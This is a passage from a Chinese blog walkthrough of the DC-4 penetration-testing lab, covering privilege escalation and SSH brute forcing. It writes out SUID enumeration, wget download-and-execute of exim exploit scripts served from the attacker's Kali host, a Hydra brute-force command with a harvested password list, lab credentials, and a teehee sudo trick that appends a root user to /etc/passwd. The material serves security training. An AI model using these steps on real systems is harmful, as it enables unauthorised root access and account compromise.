<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706151934510.png" srcset="/img/loading.gif" lazyload alt="image-20240706151934510"></p>
<p>然后放行。反弹成功，获取目标靶机合法用户的登陆权限。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706152723101.png" srcset="/img/loading.gif" lazyload alt="image-20240706152723101"></p>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>查看当前具有SUID权限的命令;</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">find / -perm -u=s -<span class="hljs-built_in">type</span> f 2&gt;/dev/null<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706155330709.png" srcset="/img/loading.gif" lazyload alt="image-20240706155330709"></p>
<p>其中，可以尝试的提权命令有：</p>
<blockquote>
<p>passwd、exim4、mount、su</p>
</blockquote>
<p>首先先切换到对方用户登陆的模式。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">python -c <span class="hljs-string">&quot;import pty;pty.spawn(&#x27;/bin/bash&#x27;);&quot;</span><br></code></pre></td></tr></table></figure>

<p>逐一尝试这些可能被提权的命令：</p>
<blockquote>
<p><code>passwd</code>：passwd root</p>
<p><code>mount</code>：mount –o bind &#x2F;bin&#x2F;bash &#x2F;usr&#x2F;bin&#x2F;mount</p>
<p><code>su</code>：su</p>
<p><code>exim4</code>：</p>
</blockquote>
<p>提示无法修改root用户的密码，表明没有root权限，没提权成功。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706221743698.png" srcset="/img/loading.gif" lazyload alt="image-20240706221743698"></p>
<p>提示只有root用户能够使用 <code>--options</code>，表明当前没有提权成功。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706222057830.png" srcset="/img/loading.gif" lazyload alt="image-20240706222057830"></p>
<p>提示需要输入密码，后台管理系统的登陆账户密码也不管用。很难通过尝试进行提权。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706222458733.png" srcset="/img/loading.gif" lazyload alt="image-20240706222458733"></p>
<p>最后是exim4，它的提权难度较大。</p>
<p>首先先查看exim4的版本：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">exim4 --version<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706224633919.png" srcset="/img/loading.gif" lazyload alt="image-20240706224633919"></p>
<blockquote>
<p>exim4：4.89</p>
</blockquote>
<p>明确使用exim4进行提权后，使用<code>searchsploit</code>查询可用于提权的代码文件。</p>
<p>注意！正常来说，命令应该是exim，不是exim4哦！这么输入会报错的。</p>
<p>exim4：exim指令的version4。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">searchsploit exim 4<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706225050928.png" srcset="/img/loading.gif" lazyload alt="image-20240706225050928"></p>
<p>搜索得到的结果不少哦！一般文件后缀为txt文件的比较容易实现。但是这些实现都需要自己手动按照其指示的方法实现。</p>
<blockquote>
<p>linux&#x2F;remote&#x2F;25297.txt</p>
<p>linux&#x2F;remote&#x2F;46974.txt</p>
<p>multiple&#x2F;dos&#x2F;43184.txt</p>
<p>linux&#x2F;local&#x2F;39549.txt</p>
<p>linux&#x2F;dos&#x2F;23896.txt</p>
</blockquote>
<p>仔细一看，我们发现其中有<code>.sh</code>后缀的文件，这些文件一般为shell脚本文件。通过运行命令就可以进行利用的，会比手动实现方法相对节省时间。</p>
<blockquote>
<p>linux&#x2F;local&#x2F;796.sh</p>
<p>linux&#x2F;local&#x2F;39535.sh</p>
<p>linux&#x2F;local&#x2F;46996.sh</p>
</blockquote>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706225933071.png" srcset="/img/loading.gif" lazyload alt="image-20240706225933071"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">searchsploit -m 796.sh<br>searchsploit -m 39535.sh<br>searchsploit -m 46996.sh<br></code></pre></td></tr></table></figure>

<p>将这三个.sh文件均下载到当前目录下。</p>
<p>然后将脚本部署到服务器中，并让目标靶机通过<code>wget</code>命令下载该提权脚本进行执行（以目标靶机合法用户的身份以及交互界面下载）。</p>
<p>当前kali与目标靶机位于同一网段。所以可以在本机（kali）部署<code>apache2</code>服务让目标靶机下载即可。</p>
<p>首先在本机（kali）启动apache2服务，然后将下载的shell脚本文件复制到 <code>/var/www/html/</code>文件夹下，相当于放到网页上。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs bash">service apache2 start<br><span class="hljs-built_in">cp</span> 796.sh /var/www/html/<br>service apache2 status  //查看状态<br><br><span class="hljs-built_in">cp</span> 39535.sh /var/www/html/<br><span class="hljs-built_in">cp</span> 46996.sh /var/www/html/<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706232255198.png" srcset="/img/loading.gif" lazyload alt="image-20240706232255198"></p>
<p>为了防止某一个脚本提权失败，我们把其它的脚本也复制上去。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706233427682.png" srcset="/img/loading.gif" lazyload alt="image-20240706233427682"></p>
<p>然后到目标靶机（目标靶机用户交互界面处），执行下载操作。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">wget http://192.168.204.128/796.sh<br>wget http://192.168.204.128/39535.sh<br>wget http://192.168.204.128/46996.sh<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706232619485.png" srcset="/img/loading.gif" lazyload alt="image-20240706232619485"></p>
<p>由于权限不够，所以下载操作被拒绝了，无法在当前目录进行写入。</p>
<blockquote>
<p>一般情况下，<code>tmp</code>目录都具有相当高的权限。</p>
</blockquote>
<p>因此，可以尝试切换到<code>/tmp</code>目录下进行提权脚本的下载。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706232913257.png" srcset="/img/loading.gif" lazyload alt="image-20240706232913257"></p>
<p>下载成功。把三个都给下载了：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706234051092.png" srcset="/img/loading.gif" lazyload alt="image-20240706234051092"></p>
<p>然后为下载的脚本加上可执行权限，并执行。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">chmod</span> +x 796.sh<br>./796.sh<br><br><span class="hljs-built_in">chmod</span> +x 39535.sh<br>./39535.sh<br><br><span class="hljs-built_in">chmod</span> +x 46996.sh<br>./46996.sh<br></code></pre></td></tr></table></figure>

<ul>
<li>.&#x2F;796.sh：发生gcc错误，提权失败。</li>
</ul>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706233248963.png" srcset="/img/loading.gif" lazyload alt="image-20240706233248963"></p>
<ul>
<li>39535.sh：没有找到exim命令，提权失败。</li>
</ul>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706234322456.png" srcset="/img/loading.gif" lazyload alt="image-20240706234322456"></p>
<ul>
<li>46996.sh：提权成功。</li>
</ul>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706234350082.png" srcset="/img/loading.gif" lazyload alt="image-20240706234350082"></p>
<p>查找flag文件。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">find / -name *flag*<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706234829075.png" srcset="/img/loading.gif" lazyload alt="image-20240706234829075"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">cat</span> /root/flag.txt<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706234846253.png" srcset="/img/loading.gif" lazyload alt="image-20240706234846253"></p>
<p>至此，所有工作完成。</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>这次是通过burpsuite进行用户名和密码爆破，然后通过shell注入、反弹shell以及命令提权获取最后的flag。</p>
<p>但是在之前进行Getshell的时候我们还使用到了ssh远程连接。</p>
<p>所以对于这个靶场，也可以尝试进行ssh爆破（hydra）。</p>
<blockquote>
<p>一般在<code>/home</code>目录下能够找到其他用户的文件夹或者更多信息，也能够从各个文件夹中找到更多信息。</p>
</blockquote>
<p>在提权成功后，在<code>/home</code>目录下的jim-backups文件夹中，发现了一个名为<code>old-passwords.bak</code>的文件。</p>
<p>注意！home目录下的三个文件夹看着很像用户的文件夹。所以在后续进行爆破的时候，用户名字典就从这三个文件夹名入手。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240706235128164.png" srcset="/img/loading.gif" lazyload alt="image-20240706235128164"></p>
<blockquote>
<p>.bak后缀的文件通常是备份文件。用于存储数据的副本，以防止原始文件意外丢失或损坏。</p>
</blockquote>
<p>查看其具体内容,可以猜测是一个密码字典。对其进行复制保存，也许以后爆破的时候会用上。</p>
<blockquote>
<p>000000<br>12345<br>iloveyou<br>1q2w3e4r5t<br>1234<br>123456a<br>qwertyuiop<br>monkey<br>123321<br>dragon<br>654321<br>666666<br>123<br>myspace1<br>a123456<br>121212<br>1qaz2wsx<br>123qwe<br>123abc<br>tinkle<br>target123<br>gwerty<br>1g2w3e4r<br>gwerty123<br>zag12wsx<br>7777777<br>qwerty1<br>1q2w3e4r<br>987654321<br>222222<br>qwe123<br>qwerty123<br>zxcvbnm<br>555555<br>112233<br>fuckyou<br>asdfghjkl<br>12345a<br>123123123<br>1q2w3e<br>qazwsx<br>loveme1<br>juventus<br>jennifer1<br>!~!1<br>bubbles<br>samuel<br>fuckoff<br>lovers<br>cheese1<br>0123456<br>123asd<br>999999999<br>madison<br>elizabeth1<br>music<br>buster1<br>lauren<br>david1<br>tigger1<br>123qweasd<br>taylor1<br>carlos<br>tinkerbell<br>samantha1<br>Sojdlg123aljg<br>joshua1<br>poop<br>stella<br>myspace123<br>asdasd5<br>freedom1<br>whatever1<br>xxxxxx<br>00000<br>valentina<br>a1b2c3<br>741852963<br>austin<br>monica<br>qaz123<br>lovely1<br>music1<br>harley1<br>family1<br>spongebob1<br>steven<br>nirvana<br>1234abcd<br>hellokitty<br>thomas1<br>cooper<br>520520<br>muffin<br>christian1<br>love13<br>fucku2<br>arsenal1<br>lucky7<br>diablo<br>apples<br>george1<br>babyboy1<br>crystal<br>1122334455<br>player1<br>aa123456<br>vfhbyf<br>forever1<br>Password<br>winston<br>chivas1<br>sexy<br>hockey1<br>1a2b3c4d<br>pussy<br>playboy1<br>stalker<br>cherry<br>tweety<br>toyota<br>creative<br>gemini<br>pretty1<br>maverick<br>brittany1<br>nathan1<br>letmein1<br>cameron1<br>secret1<br>google1<br>heaven<br>martina<br>murphy<br>spongebob<br>uQA9Ebw445<br>fernando<br>pretty<br>startfinding<br>softball<br>dolphin1<br>fuckme<br>test123<br>qwerty1234<br>kobe24<br>alejandro<br>adrian<br>september<br>aaaaaa1<br>bubba1<br>isabella<br>abc123456<br>password3<br>jason1<br>abcdefg123<br>loveyou1<br>shannon<br>100200<br>manuel<br>leonardo<br>molly1<br>flowers<br>123456z<br>007007<br>password.<br>321321<br>miguel<br>samsung1<br>sergey<br>sweet1<br>abc1234<br>windows<br>qwert123<br>vfrcbv<br>poohbear<br>d123456<br>school1<br>badboy<br>951753<br>123456c<br>111<br>steven1<br>snoopy1<br>garfield<br>YAgjecc826<br>compaq<br>candy1<br>sarah1<br>qwerty123456<br>123456l<br>eminem1<br>141414<br>789789<br>maria<br>steelers<br>iloveme1<br>morgan1<br>winner<br>boomer<br>lolita<br>nastya<br>alexis1<br>carmen<br>angelo<br>nicholas1<br>portugal<br>precious<br>jackass1<br>jonathan1<br>yfnfif<br>bitch<br>tiffany<br>rabbit<br>rainbow1<br>angel123<br>popcorn<br>barbara<br>brandy<br>starwars1<br>barney<br>natalia<br>jibril04<br>hiphop<br>tiffany1<br>shorty<br>poohbear1<br>simone<br>albert<br>marlboro<br>hardcore<br>cowboys<br>sydney<br>alex<br>scorpio<br>1234512345<br>q12345<br>qq123456<br>onelove<br>bond007<br>abcdefg1<br>eagles<br>crystal1<br>azertyuiop<br>winter<br>sexy12<br>angelina<br>james<br>svetlana<br>fatima<br>123456k<br>icecream<br>popcorn1</p>
</blockquote>
<p>kali默认密码字典：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">/usr/share/wordlists/rockyou.txt<br></code></pre></td></tr></table></figure>

<p>pay：如果之前没有进入到目标目录对默认字典文件进行解压的话，是会报错的。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">gunzip rockyou.txt.gz<br></code></pre></td></tr></table></figure>

<h3 id="hydra爆破"><a href="#hydra爆破" class="headerlink" title="hydra爆破"></a>hydra爆破</h3><p>使用默认密码字典进行爆破的话所需的时间 太长了，而且也有爆破失败的风险</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">hydra -L usersname.txt -P passworddicDC4.txt ssh://192.168.204.133<br></code></pre></td></tr></table></figure>

<p>其中：</p>
<p><code>passworddicDC4.txt</code>是上述从jim文件夹中获取到的密码备份文件。</p>
<p><code>usersname.txt</code>中包含在目标靶机home目录下的疑似用户文件夹的三个用户名。</p>
<p>ok！很快就爆破出了一个合法的SSH账户：</p>
<blockquote>
<p>host: 192.168.204.133 </p>
<p>login: jim </p>
<p>password: jibril04</p>
</blockquote>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715131345123.png" srcset="/img/loading.gif" lazyload alt="image-20240715131345123"></p>
<h3 id="ssh连接"><a href="#ssh连接" class="headerlink" title="ssh连接"></a>ssh连接</h3><blockquote>
<p>host: 192.168.204.133 </p>
<p>login: jim </p>
<p>password: jibril04</p>
</blockquote>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">ssh jim@192.168.204.133<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715131622681.png" srcset="/img/loading.gif" lazyload alt="image-20240715131622681"></p>
<p>ok！成功远程登陆了jim账户。</p>
<h3 id="提权-1"><a href="#提权-1" class="headerlink" title="提权"></a>提权</h3><p>使用<code>sudo -l</code>显示出当前登陆用户的权限：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715131837232.png" srcset="/img/loading.gif" lazyload alt="image-20240715131837232"></p>
<p>由上述执行结果可知，需要输入jim用户的sudo账户密码，但是我们不知道。</p>
<p>接着我们查看jim用户所在系统中具有SUID权限的命令：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">find / -perm -u=s -<span class="hljs-built_in">type</span> f 2&gt;/dev/null<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715132113057.png" srcset="/img/loading.gif" lazyload alt="image-20240715132113057"></p>
<p>这其中，可以尝试的提权指令有：exim4、mount、su、passwd。但是经过上述的经验，最终能成功进行提权的命令只有exim4，但是它的提权过程比较复杂。</p>
<p>所以我们可以尝试获取其它信息并择出其中有用的信息进行提权。</p>
<p>使用<code>ls</code>指令查看当前用户的目录列表：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715132521386.png" srcset="/img/loading.gif" lazyload alt="image-20240715132521386"></p>
<p>发现了一个shell脚本<code>test.sh</code>，但是光看名字感觉就好像不太能提权的样子。还有一个提示信息，提示在存储邮件文件的文件夹<code>/var/mail/jim</code>下有新的邮件，尝试进入查看并寻找有用信息。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">cd</span> /var/mail/jim<br></code></pre></td></tr></table></figure>

<p>提示错误：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715132833915.png" srcset="/img/loading.gif" lazyload alt="image-20240715132833915"></p>
<p>再次尝试进入其上一级目录：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">cd</span> /var/mail<br><span class="hljs-built_in">ls</span><br><span class="hljs-built_in">cat</span> jim<br></code></pre></td></tr></table></figure>

<p>成功：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715132958425.png" srcset="/img/loading.gif" lazyload alt="image-20240715132958425"></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715133158149.png" srcset="/img/loading.gif" lazyload alt="image-20240715133158149"></p>
<p>读取邮件信息可以得到jim的同事，Charles的账户信息：</p>
<blockquote>
<p>user：Charles</p>
<p>password：^xHhA&amp;hvim0y</p>
</blockquote>
<p>尝试远程登陆Charles的账户：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">ssh Charles@192.168.204.133<br></code></pre></td></tr></table></figure>

<p>因为已经远程登陆了jim账户，所再尝试同时登陆Charles的账户时就会被拒绝请求，因此我们需要在jim终端进行账户切换。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">su Charles<br>su charles<br></code></pre></td></tr></table></figure>

<p>惹，报错惹：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715133710662.png" srcset="/img/loading.gif" lazyload alt="image-20240715133710662"></p>
<p>回去查看了一下邮件，发现其对jim的称呼为<code>Jim</code>，猜测实际用户名应该是小写开头。</p>
<p>ok！成功切换：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715133858991.png" srcset="/img/loading.gif" lazyload alt="image-20240715133858991"></p>
<p>查看charles用户中具有SUID权限的命令都有哪些：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">find / -perm -u=s -<span class="hljs-built_in">type</span> f 2&gt;/dev/null<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715134104570.png" srcset="/img/loading.gif" lazyload alt="image-20240715134104570"></p>
<p>查询结果和jim的一样，再使用<code>sudo -l</code>显示出当前登陆用户的权限：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715134313545.png" srcset="/img/loading.gif" lazyload alt="image-20240715134313545"></p>
<p>根据提示信息可以知道，<code>/usr/bin/teehee</code>具有root权限，可以尝试提权。</p>
<blockquote>
<p>teehee是一个小众的linux编辑器，若其拥有root权限，则可用于提权。提权的核心思路是：利用其在passwd文件中追加一条uid为0的用户条目。</p>
</blockquote>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;Name::0:0:::/bin/bash&quot;</span> | sudo teehee -a /etc/passwd<br></code></pre></td></tr></table></figure>

<p>这里的<code>Name</code>可以是任意名字。执行该条指令之后，再执行：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">su Name<br></code></pre></td></tr></table></figure>

<p>即可成功提权！</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715135103294.png" srcset="/img/loading.gif" lazyload alt="image-20240715135103294"></p>
<p>四处查看文件：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715135346117.png" srcset="/img/loading.gif" lazyload alt="image-20240715135346117"></p>
<p>退回上一级目录，进行文件匹配查找：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">find / -name *flag*<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715135445574.png" srcset="/img/loading.gif" lazyload alt="image-20240715135445574"></p>
<p>ok！成功找到！</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240715135511759.png" srcset="/img/loading.gif" lazyload alt="image-20240715135511759"></p>
<p>提权完毕！</p>
<h3 id="总结-1"><a href="#总结-1" class="headerlink" title="总结"></a>总结</h3><p>使用hydra爆破SSH账户进行提权，其过程要比burpsuite爆破并进行exim4提权的过程要简单和快速。</p>
<ol>
<li>信息检索能力很重要，拿到主机shell的时候多去翻翻目录<code>var</code>、<code>home</code>等等目录，找找信息。</li>
<li>exim4、teehee可以用于提权，多找命令。</li>
<li>如何使用命令执行反弹shell。</li>
</ol>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>DC-4</div>
      <div>https://haoisbinlove.github.io/2024/07/24/DC-4/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Sweety</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年7月24日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/07/24/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" title="渗透测试">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">渗透测试</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/07/24/DC-2/" title="DC-2">
                        <span class="hidden-mobile">DC-2</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
